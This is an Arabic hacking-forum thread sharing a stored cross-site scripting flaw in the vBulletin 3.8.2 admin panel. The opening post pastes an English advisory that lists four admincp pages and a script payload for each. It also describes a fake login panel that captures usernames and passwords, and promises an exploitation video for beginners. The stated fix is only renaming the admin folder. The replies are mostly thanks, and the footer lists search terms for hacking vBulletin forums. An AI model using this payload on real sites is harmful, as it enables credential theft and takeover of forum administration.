اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 13

الموضوع: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

  1. #1
    هكر متميز Array الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,793

    افتراضي ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip



    بسم الله الرحمن الرحيم

    الثغرة و انا ادور لقيتها و حبيت اطرحها لعل و عسى انه نستفيد و نقفلها

    الثغره هي .. صورتين وملف هتكس .. ويقوم المهاجم بوضع رابط في اي موضوع ..

    وعند دخول اي شخص يطلع له لوحة مثل الفلتر وعند وضع الباس واليوزر ينرسل إلى ملف التكست او الكوكيز ..كود بلغة HTML:


    يعني الثغره زي Add a new title+Post Icons+post new Smilies



    .. حل الثغره ..

    تغيير مجلد الـ admincp .. ووضع جدار ناري .. ==> حل مؤقت لين ما يفرجها ربي

    و الحمدلله اتوقع الكثير مقفلين ادمن سي بي و مغيرينه يعني ما راح تكون خطيرة

    و ان شاء الله ينزل ترقيع رسمي
    كود بلغة HTML:

    vBulletin 3.8.2 adminCP Cross-Site ScriptingR.I.P DrtRp - We miss you---------------------------------------------Original Post at http://forum.aria-security.com/en/sh...p?p=1179Greetz to Aura & all Aria-Security Mods & MembersThese were all tested on vbulletin 3.8.0 RC2 so other version may be effected.1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>or any other XSS code.2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>




    بتمنى الكل استفاد
    والاستغلال للمبتدئين فيديو قريباً








  2. #2
    هكر متألق Array الصورة الرمزية Iraqe Hacker
    تاريخ التسجيل
    Jul 2012
    الدولة
    Iraqe Hacker™ ✔©Page&Official®Mafia █║▌│█│║▌║││█║▌║▌║
    المشاركات
    3,254

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    حمودي بدال النجوم في كلمات محذوفة لازم تسوي فراغات بينها
    تحياتي الك


  3. #3
    :: مراقب عام :: Array الصورة الرمزية shhaby
    تاريخ التسجيل
    Nov 2012
    المشاركات
    3,233

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مبدع وابداع ... الاثنين معاً



  4. #4
    هكر نشيط Array الصورة الرمزية fouade
    تاريخ التسجيل
    Oct 2012
    الدولة
    المغرب ابو الدنيا
    المشاركات
    162

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مبدع اخي تغرة لها مكانيكية xss


  5. #5
    هكر متميز Array الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,793

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكور يشباب وشكرا اخي عراق هكر على المعلومة


  6. #6
    هكر مجتهد Array
    تاريخ التسجيل
    Nov 2012
    المشاركات
    248

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكوور يا غالي



  7. #7
    محظور Array
    تاريخ التسجيل
    Jan 2012
    الدولة
    الجزائر.فلسطين
    المشاركات
    1,490

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكوررررررررررررررررررررر ر


  8. #8
    هكر مجتهد Array الصورة الرمزية MJNONFIK
    تاريخ التسجيل
    May 2011
    المشاركات
    500

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكوووووووور رائع


  9. #9
    هكر مجتهد Array الصورة الرمزية كاسر المشاعر
    تاريخ التسجيل
    Nov 2012
    المشاركات
    525

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    يسلموووووووووو



  10. #10
    هكر متميز Array الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,793

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكور اخي عالمرور


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. تحميل كتب احتراف استغلال xss من الصفر الى الاحتراف Cross-Site Scripting XSS Attack
    بواسطة Hidden pain في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 0
    آخر مشاركة: 09-18-2012, 10:19 PM
  2. ثغرة في منتديات الفي بي vBulletin 4.0.x
    بواسطة millen!um في المنتدى قسم الثغرات
    مشاركات: 25
    آخر مشاركة: 07-13-2012, 12:22 AM
  3. ثغرة XSS في منتديات vBulletin 3.8.4
    بواسطة hacks في المنتدى قسم الثغرات
    مشاركات: 5
    آخر مشاركة: 07-06-2012, 07:29 AM
  4. مشكله بي ثغره vb3.8.6، ثغرة vb 3.8.6 ثغرة في بي 3.8.6 ثغرة 3.8.6 ثغرة vbulletin 3.8.6
    بواسطة هكر لايرحم في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 3
    آخر مشاركة: 02-26-2012, 02:44 AM
  5. (SQL) SnapProof (cart.php) Cross Site Scripting
    بواسطة هاوي حنانك في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 03-03-2011, 08:12 PM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرات منتديات vb

ثغره جديدة

powered by vbulletin® version 3.8.2

ثغرات vBulletin 3.8.2

الثغرات الجديده

اختراق منتدى 3.8.2

شرح ثغرة xss 2013

كيف اخترق بطريقة admincp هذه المواقع vBulletin Solutions

ثغرات منتديات vb 2013

برنامج بحث ثغرة powered by v Bulletin Version 3.8.6

ثغرة vbulletin 3.8.2

Powered by vBulletin™ Version 3.8.2 Copyright ©

اختراق vbulletin

اسد مرعب

powered by vbulletin version 3.8.6 exploit

powered by vbulletin 3.8.2

اختراق vb 3.8.2

Copyright ثغره

كيف وضع ثغرة لمنتديات في بي

استغلال vBulletin 3.8.2

ثغرة منتديات 2013

اختراق 3.8.2

ثغره Powered by vBulletin Copyright 2013

ثغرات المنتديات vb2013

ثــغره vBulletin 3.8.4

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •